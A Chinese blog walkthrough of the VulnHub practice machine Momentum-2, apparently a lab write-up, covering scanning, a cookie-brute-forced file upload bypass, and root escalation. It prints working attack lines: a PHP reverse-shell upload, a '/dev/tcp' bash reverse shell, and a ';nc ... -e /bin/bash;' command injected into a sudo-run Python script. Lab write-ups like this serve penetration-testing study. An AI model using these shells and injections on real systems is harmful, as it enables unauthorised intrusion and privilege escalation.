靶场练习第二十二天~vulnhub靶场之Momentum-2

最新推荐文章于 2023-09-09 18:03:30 发布
最新推荐文章于 2023-09-09 18:03:30 发布
阅读量629 收藏 3
点赞数
分类专栏: # 靶机练习 文章标签: 安全 web安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_57976347/article/details/122953618
版权

一、准备工作

靶机下载地址:Momentum: 2 ~ VulnHub

1.查看kali的ip

使用命令ifconfig

2.使用nmap命令

nmap 192.168.101.0/24

查看开放的端口和协议:nmap -sV 192.168.101.114

二、信息收集

1.使用gobuster,寻找隐藏的网站

gobuster dir -u http://192.168.101.114/ -x html,php,txt,php.bak,bak -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

发现一个可以上传文件的网站:http://192.168.101.114/dashboard.html

2.利用bp抓包软件将文件上传

上传一句话木马php文件

访问http://192.168.101.114/ajax.php.bak看到一个文件,如果参数为secure,值等于val1d就允许上传pdf、php、txt文件

抓包添加cookie与参数

cookie: admin=&G6u@B6uDXMq&Ms

-----------------------------150269877033212106221702063904

Content-Disposition: form-data; name="secure";

val1d

还有将一句话木马改成反向连接木马,自动生成的反向连接木马地址:https://forum.ywhack.com/reverse-shell/将自动生成的php反向连接脚本替换掉一句话木马

将修改好的数据发送到intruder里面进行爆破

添加要爆破的参数将事先写好的26大写英文字母字典添加到Payload Options爆破返回的长度一样,查看返回的参数哪个有1

将数据上传,可以发现上传成功

三、提权

1.利用php反向连接脚本连接靶机

(1)在kali开启监听功能:nc -lvvp 8888

(2)访问刚才上传的反向连接脚本

(3)看一看kali那边连接情况,已经反向连接成功了

(4)第一个flag

(5)ssh远程连接

发现一个用户密码: athena、myvulnerableapp*,使用命令:ssh athena@192.168.101.114

(6)提权payload

查看该用户的权限并且该用户能够利用引用root相关的执行文件有哪些

1.cat /home/team-tasks/cookie-gen.py

将反弹root权限的shell命令存入seed变量执行

echo "bash -c 'exec bash -i &>/dev/tcp/192.168.101.114/4444 <&1'" | base64

1.sudo -u root /usr/bin/python3 /home/team-tasks/cookie-gen.py

2.;nc 192.168.101.10 4444 -e /bin/bash;

3.反向连接:nc -lnvp 4444

4.优化命令执行终端,执行下面命令进入python交互式(注意要下载python环境才能运行):

python -c ‘import pty;pty.spawn(“/bin/bash”)’

5.第二flag

汉南帝
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
VulnHub靶场-Momentum: 2
hxync的博客
08-10 541
靶场下载地址:Momentum: 2 下好之后导入virtualbox启动 照例先扫一下主机 扫到靶机的ip地址为192.168.1.15 扫一下端口,开放了22和80端口 浏览器访问一下80端口 发现没有什么有用的信息,源码也看了一下,也没什么有用的信息 dirbuster扫一下目录 发现了一个文件上传的页面 一个备份文件 一个js文件 代码内容大概是当cookie存在且值为后面给出的那个字符串,注释部分有说明还需在字符串后面加一个大写字母,再用POST提交一个secure参数,参数的值
VulnHub靶机_MOMENTUM: 2
学术渣渣的博客
09-05 633
文章目录靶机介绍渗透过程靶机IP获取端口扫描信息收集信息1信息2burpsuite抓包改包 靶机介绍 这个是Momentum系列的第二个靶机,第一个靶机详见:Momentum:1 下载地址:http://www.vulnhub.com/entry/momentum-2,702/ 难度:中等 描述:关键词curl, bash, code review 渗透过程 靶机IP获取 靶机的IP为192.168.1.105。 arp-scan -l 端口扫描 靶机开放了22和80端口。 nmap -A -T4 -p
vulnhub-Momentum2
plant1234的博客
08-30 519
vulnhub-Momentum2靶机 首先先去下载靶机地址: https://download.vulnhub.com/momentum/Momentum2.ova 下载完靶机,直接利用VMave导入打开 一,信息收集 首先确定自己的靶机为net模式,知道自己靶机所在网段 然后利用kali进行IP扫描: nmap -sP 192.168.229.0/24 发现存活的IP,除去自己的IP 发现靶机IP:192.168.229.155 如果不能扫描出IP就查看这篇博客: https://hackergu.
Momentum2-靶机
薛定谔嘚喵博客
04-09 358
本靶机通过信息收集发现文件上传漏洞,并找到上传点,通过Burp爆破Cookie以上传webshell,最后通过python3提权。信息收集dirsearch以及御剑目录扫描文件上传漏洞利用crunch生成小字典BurpSuite爆破cookiesudo -l查看当前的权限,发现可以使用python3提权。
看完这篇 教你玩转渗透测试靶机Vulnhub——Momentum:2
最新发布
Aluxian_的博客
09-09 736
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。PS:这个是Momentum系列一共有2个靶机,分别是1.2老样子需要获得root权限找到flagmedium。
Momentum-Strategies-on-Options
04-29
期权动量策略 该项目由纽约大学丹顿分校MFE系的6名研究生组成。 它着手研究用期权捕捉动量效应同时最小化市场风险的有效性。 通过引入可调节的比例因子,杠杆不足的投资组合可以利用动量效应,同时保持比直接投资于...
harmonyos2-Momentum-AI-machine-learning-course:MomentumAI机器学习课程
07-01
和声2 Momentum-AI-机器学习课程 这个 Momentum AI 的机器学习课程,教你如何使用最新的深度学习技术。 了解更多信息 Google 文档,概述了如何开始使用深度学习。 关于人工智能和机器学习的演讲。 本课程将教您如何...
Orbital-angular-momentum-based reconfigurable optical switching and routing
02-07
Orbital angular momentum (OAM) has gained interest due to its potential to increase capacity in optical communication systems as well as an additional domain for reconfigurable networks. This is due ...
momentum-clone
04-27
该项目是通过引导的。 您将在下面找到一些有关如何执行常见任务的信息。 您可以在找到本指南的最新版本。 目录 自动格式化代码 更改页面<title> 安装依赖项 导入组件 代码分割 添加样式表 ...met
postcss-momentum-scrolling:PostCSS插件添加“动量”样式的滚动行为(-webkit-overflow-scrolling
04-21
PostCSS动量滚动 ... npm install postcss-momentum-scrolling --save-dev :cooking: 用法 检查你项目存在PostCSS配置: postcss.config.js在项目的根, "postcss"一节package.json或postcss捆绑配
redis的安装及简单实用(Linux下)
u013343076的专栏
03-19 849
简介 redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,包括string(字符串)、list(链表)、set(集合)、zset(sorted set --有序集合)和hash(哈希类型)。这些数据类型都支持push/pop、add/remove及取交集并集和差集及更丰富的操作,而且这些操作都是原子性的。在此基础上,redis支持各种不同
Momentum:2靶机渗透测试
weixin_49340699的博客
07-13 518
Momentum:2靶机渗透测试流程 流程 用netdiscover对目标网段进行扫描 得到目标主机192.168.19.140 使用nmap对该主机进行端口扫描 得到端口22与80端口是开启的 上80端口看到只有三张图片就对目录进行爆破 gobuster dir -u http://192.168.19.140/ -x html,php,bak,txt --wordlist /usr/share/wordlist/dirbusters/directory-list-2.3-medium.txt ht
vulnhub-Momentum靶场
leo788的博客
02-17 216
学习如何使用redis的未授权漏洞进行权限的提升,以及在线破解工具对于AES加密的破解方法。
VulnHub-MOMENTUM: 1靶机
NeverForgetCX的博客
03-03 4510
前言: 在VulnHub官网上下载好MOMENTUM: 1靶机,并直接用VM导入打开。 攻击机kali:192.168.2.87 靶机IP:192.168.2.92 信息收集: 扫描靶机ip; arp-scan -l 得到靶机ip; 扫描靶机开放的端口;看见开放了22,80端口。 访问80端口http://192.168.2.92,得到一个有四张图片的网站,话不多说...
在vmware搭建靶机Metasploitable2
冰淇淋淋淋的博客
09-17 3437
0.前提: 安装好vmware 1.下载镜像文件: 链接: https://sourceforge.net/projects/metasploitable/files/Metasploitable2/ 将zip文件下载下来之后,只需要打开Metasploitable.vmx 即可。 2.查看下虚拟机的ip 打开Metasploitable.vmx 执行: ifconfig 2.1 查看虚拟机是否能连到外网 执行: ping www.baidu.co...
SSRF-Vulnerable-Lab靶场训练
weixin_44023442的博客
01-28 1968
参考文章 SSRF-Vulnerable-Lab tag: #SSRF Ref: 1、file_get_content.php 提取并显示指定文件内容的应用程序代码 在编程语言中,有一些函数可以获取本地保存文件的内容。这些功能可能能够从远程URL以及本地文件(例如PHP中的file_get_contents)中获取内容。 如果没有对输入内容进行处理,或者处理的不够严格,将有可能导致SSRF漏洞攻击。 输入:file_get_content.php 显示: 直接暴露源码 输入:file:///C:/W
vulnhub靶场——VULNERABLE DOCKER: 1 Easy
Czheisenberg的博客
09-26 1977
ULNERABLE DOCKER: 1 Easy 渗透过程。须要利用到内网穿透工具来打内网。
vulnhub靶场——GOLDENEYE: 1 渗透记录
ShenZ的博客
02-10 2030
vulnhub—GOLDENEYE: 1 vulnhub靶场——GOLDENEYE: 1 渗透记录 About Description 一、信息搜集 二、网站渗透 三、Moodle漏洞利用
看完这篇 教你玩转渗透测试靶机Vulnhub——Momentum:1
Aluxian_的博客
09-07 411
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。PS:这个是Momentum系列一共有2个靶机,分别是1.2老样子需要获得root权限找到flag这个靶机难度比较简单吧1.信息收集获取ip地址 和端口信息web等 查看F12源码信息2.XSS漏洞获取cookie信息AES解密 获取密码3.redis-cli获取rootredis-6379得登入操作命令学习)Momentum。
模糊搜索包含" Iteration Continuity X-momentum Y-momentum Z-momentum Energy"的行,然后删除整行
05-22
假设你要操作的文件名为`file.txt`,可以使用以下命令在终端进行模糊搜索并删除符合条件的行: ``` sed -i '/Iteration Continuity X-momentum Y-momentum Z-momentum Energy/d' file.txt ``` 解释一下命令: - `sed` 是一个流编辑器,用于文本替换和转换。 - `-i` 参数表示直接修改原文件。 - `'/Iteration Continuity X-momentum Y-momentum Z-momentum Energy/d'` 是正则表达式,表示删除包含该字符串的行。 - `file.txt` 是要操作的文件名。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值